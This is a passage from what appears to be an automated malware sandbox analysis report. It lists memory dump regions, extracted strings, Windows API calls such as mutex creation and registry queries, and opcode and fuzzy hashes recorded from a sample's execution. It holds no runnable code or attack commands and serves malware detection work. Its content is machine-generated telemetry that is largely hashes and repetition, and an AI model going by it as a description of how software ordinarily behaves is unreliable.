              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: hV
              • API String ID: 0-4113920308
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: \,
              • API String ID: 0-2769694602
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: \,
              • API String ID: 0-2769694602
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: hV
              • API String ID: 0-4113920308
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: >_uq
              • API String ID: 0-588969242
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: Zp^$Yp^
              • API String ID: 0-574385174
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0120AAB1
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 84084c9733e4e70473c3eb9a088886344feddb70b2b5cd86faa41fc078a83e8f
              • Instruction ID: 5c896203604e4292a1a8513f8d9d9c8595198e718b1b67272c26cdc96b50e1b1
              • Opcode Fuzzy Hash: 84084c9733e4e70473c3eb9a088886344feddb70b2b5cd86faa41fc078a83e8f
              • Instruction Fuzzy Hash: 7B31C2B25443846FE7228B25CC45FA7BFBCEF05310F0885AAED818B193D264E949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,613CD90A,00000000,00000000,00000000,00000000), ref: 0120ABB4
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: af97bdb48308dbce026cb7bca00b238d11417f8ff08f19ebe4e48bfe9582c090
              • Instruction ID: 670430700f28315668c58ea0a8780b31d3b104ee1bb9934ff15f2d27d7c62f8f
              • Opcode Fuzzy Hash: af97bdb48308dbce026cb7bca00b238d11417f8ff08f19ebe4e48bfe9582c090
              • Instruction Fuzzy Hash: F531B1711097846FE722CF25CC84F92BFE8EF06320F08899AE985CB193D264E548CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 6866c9d4affbe7a85d96230d1967314e8fc49ded2b6a60eb20eca1730f502f15
              • Instruction ID: 125b1b8c40499b0ee7fd39ef9346f387b3236fc750f25a800e34a4998a478598
              • Opcode Fuzzy Hash: 6866c9d4affbe7a85d96230d1967314e8fc49ded2b6a60eb20eca1730f502f15
              • Instruction Fuzzy Hash: 783181B55097806FE722CB25DC84B56FFE8EF06210F08849AE985CF292D375E909CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 0120AFEA
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 4e64e08eda3db57356f63e3cbf2e6d6c6a2d2ebbbc81028539199d30e950e8ca
              • Instruction ID: 5e6cb0b7a3f0b041c9452b75762eafd3af4154c1583504a51a7892c03c8de7c5
              • Opcode Fuzzy Hash: 4e64e08eda3db57356f63e3cbf2e6d6c6a2d2ebbbc81028539199d30e950e8ca
              • Instruction Fuzzy Hash: C621B57140D3C06FD3138B259C51B65BFB4EF47620F0A41DBE984CB5A3D125A919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0120AAB1
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: d4c7278de01cd38b820b201c9e287f353947197d75cdbe29502b857b497c773d
              • Instruction ID: cd53677dc30e1d303a438c11f7320238d0ac938604374899cf0ba6d7e49e4688
              • Opcode Fuzzy Hash: d4c7278de01cd38b820b201c9e287f353947197d75cdbe29502b857b497c773d
              • Instruction Fuzzy Hash: A821C272500304AEE722CE59DD85FABFBECEF08320F04851AE9459B682D674E5498AB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 87ea9003e6d635ae176bf489fc7b57d8752619bbbfcdef835e8ffa99be4ed84c
              • Instruction ID: 1b791d134abd9f8f2fa00b89e141d4f93a58d04122d19dbeeb31b4be5b7844f9
              • Opcode Fuzzy Hash: 87ea9003e6d635ae176bf489fc7b57d8752619bbbfcdef835e8ffa99be4ed84c
              • Instruction Fuzzy Hash: A4217C75604240AFE724DF6ADC89B6AFBE8EF04310F04846AEE498F641E775E504CA61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,613CD90A,00000000,00000000,00000000,00000000), ref: 0120ABB4
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 5b7c64ab3553942cbe00e6cd42e76b5c7a5c57656c4393d979c553b8d696a45b
              • Instruction ID: 6deb4d61dc7b6c12bfa8f698ccf5ea417e5f2ec02acdc12a5faabc87f86961c7
              • Opcode Fuzzy Hash: 5b7c64ab3553942cbe00e6cd42e76b5c7a5c57656c4393d979c553b8d696a45b
              • Instruction Fuzzy Hash: BB218175600704AFE722CE19DC85F66FBECEF14710F44895AEA458B692E764E404CAB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0120A58A
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: d975022b7164b88049ad672f0bd5a87111ed72cf311883bf723e96d5cd26ba0c
              • Instruction ID: b319d9da9fe198b228714739931797dee065bfbef6ac3757aa09f9a3a0d468b5
              • Opcode Fuzzy Hash: d975022b7164b88049ad672f0bd5a87111ed72cf311883bf723e96d5cd26ba0c
              • Instruction Fuzzy Hash: FC117271409380AFDB238F55DC44A62FFF4EF4A210F08859AED858B553C375A418DB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0120B841
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: a383ed6083db950432fb6d5731ae22e9e512d476f2e63f331694b6532f386a9e
              • Instruction ID: 18afc0c2e257d8fd04554dec3dcfe0d8c8a265b0896a4a505bfb3ed238078e68
              • Opcode Fuzzy Hash: a383ed6083db950432fb6d5731ae22e9e512d476f2e63f331694b6532f386a9e
              • Instruction Fuzzy Hash: C121AE754093C09FDB238B25DC50A92BFB0EF17214F0D84DAEDC44F163D265A958CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0120BBB9
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 5c26fd5b4684bee70357bef13d904bb75393778e6085019e4f4824517580bd5f
              • Instruction ID: efefe6077b5938194bb315f1c4559749e7463908daecced01a03aaa88d98bdc9
              • Opcode Fuzzy Hash: 5c26fd5b4684bee70357bef13d904bb75393778e6085019e4f4824517580bd5f
              • Instruction Fuzzy Hash: 8B11D3354097C09FDB238F25DC85B52FFB4EF06220F0885DEED858B563D265A818CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 0120BE70
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: 2be41d232f6eab5fdb8c2a0c84dd264d14b1595cfd25b01056dea5a3c155bc3c
              • Instruction ID: 8b6ac6d26de81f4328d93cf4200e7bdd6fafadb008b0754a5fe3a813edf37521
              • Opcode Fuzzy Hash: 2be41d232f6eab5fdb8c2a0c84dd264d14b1595cfd25b01056dea5a3c155bc3c
              • Instruction Fuzzy Hash: DA114F758093C49FD7238B259C84761BFB4DF47624F0984DAED858F253D2656848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 05340550
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 012162529c6a13bd69f321664eaacdcd2c94782ab9bcf3694f59fe40444e336c
              • Instruction ID: 4f79c6136e1f6d0dbaef8a7d9f3801cbc2981c0aca0d3f24e56ee121cc91d962
              • Opcode Fuzzy Hash: 012162529c6a13bd69f321664eaacdcd2c94782ab9bcf3694f59fe40444e336c
              • Instruction Fuzzy Hash: ED1193715493C49FD7128F25DC85B52BFB4EF06224F0884EBED858F653D275A818CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 0120B78A
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: 57bd97fc02f30be89c34ead473cacbb924f185a16eb202c4dc8e88cbea028c72
              • Instruction ID: e6d58e43291e6ff0b547e93c2cc87201a0cd6ec0a79a18e42727489e5746b67f
              • Opcode Fuzzy Hash: 57bd97fc02f30be89c34ead473cacbb924f185a16eb202c4dc8e88cbea028c72
              • Instruction Fuzzy Hash: CC1172764083849FDB228F55DC84B52FFF4EF49310F09859EED858B562C375A458CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0120BF0C
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 5887aa7fd159c362095d51bdedc1b347bc61d1e3a34c0fc5c2b4e351ecd361e3
              • Instruction ID: 1e70c0dad6984d872b49231a2c4c80503de3907bb7c627f9e81e9f09e87767ae
              • Opcode Fuzzy Hash: 5887aa7fd159c362095d51bdedc1b347bc61d1e3a34c0fc5c2b4e351ecd361e3
              • Instruction Fuzzy Hash: A91191755053819FD722CF2ADC84B56BFE8EF06220F0884AAED85CF256D274E848CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 42dcb8a2bba3d13901c5aee830041ff0694b078237e844a2f2a59dfa02b78d91
              • Instruction ID: c09e41cb103d954b5ad293e56746ed78501198c950bcfddb8bc98ee5610417cb
              • Opcode Fuzzy Hash: 42dcb8a2bba3d13901c5aee830041ff0694b078237e844a2f2a59dfa02b78d91
              • Instruction Fuzzy Hash: DB118F754493849FD712CF15DC84B56BFB4EF06224F0984EBED458F253D279A848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0120A926
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 3e2901d9182a8a20149ee626bd043425076de8bed4933c0375ac7fc93acac5cf
              • Instruction ID: ea5b40f8e14f07adab3efb28d1c99324e3b748beceff631be30d3b9eefc7810f
              • Opcode Fuzzy Hash: 3e2901d9182a8a20149ee626bd043425076de8bed4933c0375ac7fc93acac5cf
              • Instruction Fuzzy Hash: 8B117C354097849FD7228F15DC85A52FFB4EF06220F09C59AEE868B263C375A818CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0120BF0C
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: cffb966761577a011d7371079a6323c6447480afecb69211941fafe50be8fef8
              • Instruction ID: 28550c8517ec098a84510588db9d9e75cba58229e8fa43ba12f076ff31584282
              • Opcode Fuzzy Hash: cffb966761577a011d7371079a6323c6447480afecb69211941fafe50be8fef8
              • Instruction Fuzzy Hash: 310192756103018FDB61CF2AD889766FB94EF04220F08C4AAED49CB686D675E404CEA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0120A58A
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 410c4162762abd2e1ec329b46c931d0eebe064d8abefeb445347d6d22f0d5b50
              • Instruction ID: ad68fbaf48e99b17678cd27a6b3d24180914b0abdcfea38669b7627cde753da4
              • Opcode Fuzzy Hash: 410c4162762abd2e1ec329b46c931d0eebe064d8abefeb445347d6d22f0d5b50
              • Instruction Fuzzy Hash: 5C013C719107009FDB228F55E844B56FFA0EF08620F08C55ADE494B656D376A414CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 0120B78A
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: 65bcb15bb6ed6be0cd7ec85798adada9c041198a1f25f68e5a70d1e2220152e8
              • Instruction ID: 943161f44faa243ae340f4666b8e804c32313bbe4a77ecefe1996bda6efcb770
              • Opcode Fuzzy Hash: 65bcb15bb6ed6be0cd7ec85798adada9c041198a1f25f68e5a70d1e2220152e8
              • Instruction Fuzzy Hash: 840161364007009FDB328F55D884B56FBE0EF08720F08C56EDE454A666D375E414DFA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 0120AFEA
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: eb019fadd04b608758a4b2ae0cf0c9229bbae135362bc24f34b90e95554257e9
              • Instruction ID: 1e752d814c3548f1069f947dec4be0aa3ebe72fc10bd1966103ee9e0211730f6
              • Opcode Fuzzy Hash: eb019fadd04b608758a4b2ae0cf0c9229bbae135362bc24f34b90e95554257e9
              • Instruction Fuzzy Hash: 5F01A271500604ABD714DF1ADC82B26FBA8FB89B20F14815AED084B741D231F916CBE6
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 05340550
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 7f2d8df58242da00428fc874dc98529fd40c6d58632c842e4b9a88775cad4aaa
              • Instruction ID: b72819595fab0018d47ec1960dc9fddf41a3701d45b18d18af57f423c7f06ed8
              • Opcode Fuzzy Hash: 7f2d8df58242da00428fc874dc98529fd40c6d58632c842e4b9a88775cad4aaa
              • Instruction Fuzzy Hash: A9017175604344CFDB54CF5AE8897A6FBE4EF04620F08C4AADD4A8F656D274E414CEB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0120BBB9
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: c9d785800f1016070329e898a259a5915c2e32bfc80640770d2e87eb2ca432f1
              • Instruction ID: d4d071d6349d4346cbc7db516b944d000c3a91342adace64b7e7fc611e71ace4
              • Opcode Fuzzy Hash: c9d785800f1016070329e898a259a5915c2e32bfc80640770d2e87eb2ca432f1
              • Instruction Fuzzy Hash: 5601D4395107008FDB318F1AD885B65FBA0EF04320F08C19EDD468B666E375E418CFA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 2fb8fa25e9681bf106f77d568b8162956fea0c05ad5d56f7a68110f6f52812e9
              • Instruction ID: d8c53d950a5657d7691774ad1fdb40fbfd2df34078f54ba9f59a75b48160049a
              • Opcode Fuzzy Hash: 2fb8fa25e9681bf106f77d568b8162956fea0c05ad5d56f7a68110f6f52812e9
              • Instruction Fuzzy Hash: BA01AD749103408FDB21CF1AE885769FBA4EF04220F48C4AADD4A8F696D278A404CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0120B841
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: fad028352f1babe47efe580d36bd31b1aaf86aff7b5f4a5b31ecee641ec4777c
              • Instruction ID: c0ffa620816103ca175ad58c70620f4c4c28f2a5d46d2cf9141400c5309e8065
              • Opcode Fuzzy Hash: fad028352f1babe47efe580d36bd31b1aaf86aff7b5f4a5b31ecee641ec4777c
              • Instruction Fuzzy Hash: 6001DF359003008FDB318F16D884B61FBA0EF08720F08C19ADE490B666D375A518CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0120A926
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: d1f827185a68fe6b58801c1b940162be1970cd653c1f139d67ab45a08ccb59a0
              • Instruction ID: 90124fb1995becd0bae063aca068992a1eca48dfa46cc0b4ce715f6c2aaa2c48
              • Opcode Fuzzy Hash: d1f827185a68fe6b58801c1b940162be1970cd653c1f139d67ab45a08ccb59a0
              • Instruction Fuzzy Hash: 1D01A2355107048FDB218F06D885751FFA0EF04720F08C59ADE464B656D375E418CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 0120BE70
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: a6e1b0ccb9fde65096380b0f9212335b9de2c5f0d6a191f6f64939b716563e17
              • Instruction ID: 275bad6081482ca5c24ea6b0f81137f0dde1fe885fa4cc862b42795e7df82d8f
              • Opcode Fuzzy Hash: a6e1b0ccb9fde65096380b0f9212335b9de2c5f0d6a191f6f64939b716563e17
              • Instruction Fuzzy Hash: E8F0A4399143448FDB218F1AD885761FB90EF04720F48C5AADE494B757D3B9A808CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              • Instruction Fuzzy Hash: 7B1169303091908FC7059B28D4685697FE6AFA620571581EBE04ACF3B6CE75CC0DCB92
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e6742188639dbf4d44f7caec22e5210eea4a7ed79c2b56c0f0b25822e8ace24
              • Instruction ID: 58f5f3ed3d2889c9436adf360e4e63dada24fd903b28eb5681f010159fd000b2
              • Opcode Fuzzy Hash: 9e6742188639dbf4d44f7caec22e5210eea4a7ed79c2b56c0f0b25822e8ace24
              • Instruction Fuzzy Hash: F0119E70C04269CFCB288F64C6597AE7BB1FB64308F10412EE882A7744DB759D4ADF90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 746dfd423c3205dc2a6ab8721a0cf1fa200514087bf038774af60f58ebf9af94
              • Instruction ID: c2342153238b8793c34302eb5ff83b6dbc4160b0b8798a2024ccb996d3f87dd7
              • Opcode Fuzzy Hash: 746dfd423c3205dc2a6ab8721a0cf1fa200514087bf038774af60f58ebf9af94
              • Instruction Fuzzy Hash: B701D6207042650FCB16767D54212BEA78B6FD6549758845EE006EF3C1CD69BC0783D6
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf65b864b5c5bdddd9f55704e44f89ad8a617d5a8c3fbcb24a836c2fd8913b70
              • Instruction ID: 0791bc87795a93f70d854fd5ad073a91083bcf063ddadd0af2183d7be146ce33
              • Opcode Fuzzy Hash: cf65b864b5c5bdddd9f55704e44f89ad8a617d5a8c3fbcb24a836c2fd8913b70
              • Instruction Fuzzy Hash: A901A7765097805FD7128F16EC40862FFB8EE46620709C59FEC8987611D125B909CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 852fb88c59078d67f2c90d1062e6e68a34e76f7e3f779abfc032f648f17e4f70
              • Instruction ID: 73f828d6a895fef60a6510e2e32ae80b6f7be007c5643148d115706e6d064381
              • Opcode Fuzzy Hash: 852fb88c59078d67f2c90d1062e6e68a34e76f7e3f779abfc032f648f17e4f70
              • Instruction Fuzzy Hash: 6FF096307001344BCA19767D54116BFA28BABD5989768842EE106EF3C4CD68BC0743D6
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 015a52d740c72f9d821adfc2e1db239466bd70e5f617f125c37b0ecb66c57b46
              • Instruction ID: c1b52ba86254662ff96f3888e5f7d8d00dacf3a72f52d09fcecda91fcf071081
              • Opcode Fuzzy Hash: 015a52d740c72f9d821adfc2e1db239466bd70e5f617f125c37b0ecb66c57b46
              • Instruction Fuzzy Hash: 771130351492848FD706CB10C554B25BBB2BB56718F28C6EED8894B752C33A9817DB51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b39d3d8ed04072962dbe61ab71918667b498a5a9a508aca94d6ae4578f620900
              • Instruction ID: 5507e46016a364926a4835ec5bd02a573c113ebb4623b7d48485b16ffca80993
              • Opcode Fuzzy Hash: b39d3d8ed04072962dbe61ab71918667b498a5a9a508aca94d6ae4578f620900
              • Instruction Fuzzy Hash: B8011230314160CBC7049B28D05896A77E6FFD5644B24C1AAF54ACB7A5CF75DC09CB85
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9861234e21ca3a8c2aee118626f7f81e824ba079b95b842f08eef312c4d940c6
              • Instruction ID: 46832bd4ffb78fd393575bd6f4919d5aa95592d262c63ca9c26fa300f9779acb
              • Opcode Fuzzy Hash: 9861234e21ca3a8c2aee118626f7f81e824ba079b95b842f08eef312c4d940c6
              • Instruction Fuzzy Hash: 8AF027716093749FCB226A70684A4BE7F78AEE3198B0201BBEC42D2141E6758809C762
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dfaf4033514462f8d478724a79747788077e7ed84409ab42b2e3d6ab70ed2fc1
              • Instruction ID: 27c40d7bd15ac3de2a0115917066dccaf1157e7c3e01167f8df7597c1c04c1c4
              • Opcode Fuzzy Hash: dfaf4033514462f8d478724a79747788077e7ed84409ab42b2e3d6ab70ed2fc1
              • Instruction Fuzzy Hash: 17F0A77664D3804FD3078B15BC559B17FA0EB82221B1981FBC84ACA263D515A949CB66
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a166d4782d332f50543df17b11deccc825da346a7255ddfbf6548ee5388830c5
              • Instruction ID: 9463f3352ca3bd0742fe574b45d4404be347482948c9b20e96034606c7886aaa
              • Opcode Fuzzy Hash: a166d4782d332f50543df17b11deccc825da346a7255ddfbf6548ee5388830c5
              • Instruction Fuzzy Hash: 0EF0E2306193A89FD7501AB448242BF7FE98B7B205B0A44AB8C83AB341C8689C0AC291
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
